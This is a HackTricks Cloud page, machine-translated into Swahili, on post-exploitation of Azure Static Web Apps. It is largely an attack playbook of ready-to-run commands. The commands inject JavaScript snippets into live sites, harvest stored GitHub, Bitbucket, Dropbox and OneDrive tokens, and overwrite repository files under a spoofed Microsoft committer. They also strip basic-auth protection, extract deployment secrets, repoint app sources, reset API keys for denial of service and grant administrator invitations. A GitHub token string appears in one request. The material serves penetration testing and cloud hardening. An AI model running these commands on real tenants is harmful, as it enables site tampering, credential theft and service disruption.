HackTricks CloudAz - Static Web Apps Post Exploitation
Reading time: 10 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Azure Static Web Apps
Kwa maelezo zaidi kuhusu huduma hii angalia:
Microsoft.Web/staticSites/snippets/write
Inawezekana kufanya ukurasa wa wavuti wa static upakue msimbo wa HTML wa kiholela kwa kuunda snippet. Hii inaweza kumruhusu mshambuliaji kuingiza msimbo wa JS ndani ya programu ya wavuti na kuiba taarifa nyeti kama vile akidi au funguo za mnemonic (katika pochi za web3).
Amri ifuatayo inaunda snippet ambayo itakuwa inapakuliwa kila wakati na programu ya wavuti::
az rest \
--method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"name": "supersnippet",
"location": "Body",
"applicableEnvironmentsMode": "AllEnvironments",
"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
"environments": [],
"insertBottom": false
}
}'
Soma Akikodi za Watu wa Tatu Zilizowekwa
Kama ilivyoelezwa katika sehemu ya App Service:
Kukimbia amri ifuatayo inawezekana kusoma akidi za watu wa tatu zilizowekwa katika akaunti ya sasa. Kumbuka kwamba ikiwa kwa mfano akidi za Github zimewekwa kwa mtumiaji tofauti, huwezi kupata token kutoka kwa mwingine.
az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
Amri hii inarudisha tokeni za Github, Bitbucket, Dropbox na OneDrive.
Hapa kuna mifano ya amri za kuangalia tokeni:
# GitHub – List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
# Bitbucket – List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
# Dropbox – List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
# OneDrive – List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
Overwrite file - Overwrite routes, HTML, JS...
Ni uwezekano wa kuandika upya faili ndani ya repo ya Github inayoshikilia programu kupitia Azure kwa kutumia Github token kutuma ombi kama ifuatavyo ambalo litabainisha njia ya faili ya kuandika upya, maudhui ya faili na ujumbe wa commit.
Hii inaweza kutumiwa vibaya na washambuliaji kubadilisha maudhui ya programu ya wavuti ili kutoa maudhui mabaya (kuiba akidi, funguo za mnemonic...) au tu kuhamasisha njia fulani kwa seva zao wenyewe kwa kuandika upya faili ya staticwebapp.config.json.
warning
Kumbuka kwamba ikiwa mshambuliaji atafanikiwa kuharibu repo ya Github kwa njia yoyote, wanaweza pia kuandika upya faili moja kwa moja kutoka Github.
curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
-H "Content-Type: application/json" \
-d '{
"commit": {
"message": "Update static web app route configuration",
"branchName": "main",
"committer": {
"name": "Azure App Service",
"email": "donotreply@microsoft.com"
},
"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
"filePath": "staticwebapp.config.json",
"message": "Update static web app route configuration",
"repoName": "carlospolop/my-first-static-web-app",
"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
},
"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
}'
Microsoft.Web/staticSites/config/write
Kwa ruhusa hii, inawezekana kubadilisha nenosiri linalolinda programu ya wavuti ya statiki au hata kuondoa ulinzi wa kila mazingira kwa kutuma ombi kama ifuatavyo:
# Change password
az rest --method put \
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"password": "SuperPassword123.",
"secretUrl": "",
"applicableEnvironmentsMode": "AllEnvironments"
}
}'
# Remove the need of a password
az rest --method put \
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"secretUrl": "",
"applicableEnvironmentsMode": "SpecifiedEnvironments",
"secretState": "None"
}
}'
Microsoft.Web/staticSites/listSecrets/action
Ruhusa hii inaruhusu kupata API key deployment token kwa ajili ya programu ya static:
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
Kisha, ili kusasisha programu kwa kutumia tokeni unaweza kukimbia amri ifuatayo. Kumbuka kwamba amri hii ilipatikana kwa kuangalia jinsi Github Action https://github.com/Azure/static-web-apps-deploy inavyofanya kazi, kwani ndiyo ambayo Azure imeweka kama chaguo-msingi kutumika. Hivyo picha na mipangilio inaweza kubadilika katika siku zijazo.
tip
Ili kupeleka programu unaweza kutumia zana swa kutoka https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token au kufuata hatua zifuatazo:
- Pakua repo https://github.com/staticwebdev/react-basic (au repo nyingine yoyote unayotaka kupeleka) na ukimbie
cd react-basic. - Badilisha msimbo unayotaka kupeleka
- Ipeleke ukikimbia (Kumbuka kubadilisha
<api-token>):
docker run --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
warning
Hata kama una token, huwezi kupeleka programu ikiwa Sera ya Uidhinishaji wa Upelekaji imewekwa kwenye Github. Ili kutumia token, utahitaji ruhusa Microsoft.Web/staticSites/write kubadilisha njia ya upelekaji kutumia token ya APi.
Microsoft.Web/staticSites/write
Kwa ruhusa hii inawezekana kubadilisha chanzo cha programu ya wavuti ya statiki kuwa hifadhi tofauti ya Github, hata hivyo, haitapelekwa kiotomatiki kwani hii inapaswa kufanywa kutoka kwa Kitendo cha Github.
Hata hivyo, ikiwa Sera ya Uidhinishaji wa Upelekaji imewekwa kwenye Github, inawezekana kusaidia programu kutoka kwenye hifadhi mpya ya chanzo!.
Iwapo Sera ya Uidhinishaji wa Upelekaji haijawekwa kwenye Github, unaweza kuibadilisha kwa ruhusa ile ile Microsoft.Web/staticSites/write.
# Change the source to a different Github repository
az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
# Update the deployment method to Github
az rest --method PATCH \
--url "https://management.azure.com/subscriptions/<subscription-id>>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>?api-version=2022-09-01" \
--headers 'Content-Type=application/json' \
--body '{
"properties": {
"allowConfigFileUpdates": true,
"stagingEnvironmentPolicy": "Enabled",
"buildProperties": {
"appLocation": "/",
"apiLocation": "",
"appArtifactLocation": "build"
},
"deploymentAuthPolicy": "GitHub",
"repositoryToken": "<github_token>" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
}
}'
Mfano wa Github Action ya kupeleka programu:
name: Azure Static Web Apps CI/CD
on:
push:
branches:
- main
pull_request:
types: [opened, synchronize, reopened, closed]
branches:
- main
jobs:
build_and_deploy_job:
if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed')
runs-on: ubuntu-latest
name: Build and Deploy Job
permissions:
id-token: write
contents: read
steps:
- uses: actions/checkout@v3
with:
submodules: true
lfs: false
- name: Install OIDC Client from Core Package
run: npm install @actions/core@1.6.0 @actions/http-client
- name: Get Id Token
uses: actions/github-script@v6
id: idtoken
with:
script: |
const coredemo = require('@actions/core')
return await coredemo.getIDToken()
result-encoding: string
- name: Build And Deploy
id: builddeploy
uses: Azure/static-web-apps-deploy@v1
with:
azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication
action: "upload"
###### Repository/Build Configurations - These values can be configured to match your app requirements. ######
# For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig
app_location: "/" # App source code path
api_location: "" # Api source code path - optional
output_location: "build" # Built app content directory - optional
github_id_token: ${{ steps.idtoken.outputs.result }}
###### End of Repository/Build Configurations ######
close_pull_request_job:
if: github.event_name == 'pull_request' && github.event.action == 'closed'
runs-on: ubuntu-latest
name: Close Pull Request Job
steps:
- name: Close Pull Request
id: closepullrequest
uses: Azure/static-web-apps-deploy@v1
with:
action: "close"
Microsoft.Web/staticSites/resetapikey/action
Kwa ruhusa hii inawezekana kurekebisha funguo za API za programu ya wavuti ya statiki ambayo inaweza kusababisha DoS kwa michakato inayotunga programu kiotomatiki.
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
Microsoft.Web/staticSites/createUserInvitation/action
Ruhusa hii inaruhusu kuunda mwaliko kwa mtumiaji ili kufikia njia zilizo salama ndani ya programu ya wavuti ya static yenye jukumu maalum lililotolewa.
Kuingia kuna mahali kama /.auth/login/github kwa github au /.auth/login/aad kwa Entra ID na mtumiaji anaweza kualikwa kwa amri ifuatayo:
az staticwebapp users invite \
--authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \
--domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \
--invitation-expiration-in-hours 168 # 7 days is max \
--name my-first-static-web-app # Name of the app\
--roles "contributor,administrator" # Comma sepparated list of roles\
--user-details username # Github username in this case\
--resource-group Resource_Group_1 # Resource group of the app
Pull Requests
Kwa default, Pull Requests kutoka tawi katika repo hiyo hiyo zitakusanywa na kujengwa kiotomatiki katika mazingira ya staging. Hii inaweza kutumiwa vibaya na mshambuliaji mwenye ufikiaji wa kuandika kwenye repo lakini bila uwezo wa kupita ulinzi wa tawi la uzalishaji (kawaida main) ili kupeleka toleo la uharibifu la programu katika URL ya stagging.
URL ya staging ina muundo huu: https://<app-subdomain>-<PR-num>.<region>.<res-of-app-domain> kama: https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net
tip
Kumbuka kwamba kwa default PR za nje hazitakimbia workflows isipokuwa zimeunganishwa angalau PR 1 katika hifadhi. Mshambuliaji anaweza kutuma PR halali kwenye repo na kisha kutuma PR ya uharibifu kwenye repo ili kupeleka programu ya uharibifu katika mazingira ya stagging. HATA HIVYO, kuna ulinzi usiotarajiwa, Github Action ya default ya kupeleka kwenye static web app inahitaji ufikiaji wa siri inayoshikilia token ya kupeleka (kama secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F) hata kama kupeleka kunafanywa kwa IDToken. Hii inamaanisha kwamba kwa sababu PR ya nje haina ufikiaji wa siri hii na PR ya nje haiwezi kubadilisha Workflow kuweka hapa token isiyo ya kawaida bila PR kukubaliwa, shambulio hili halitafanya kazi kweli.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.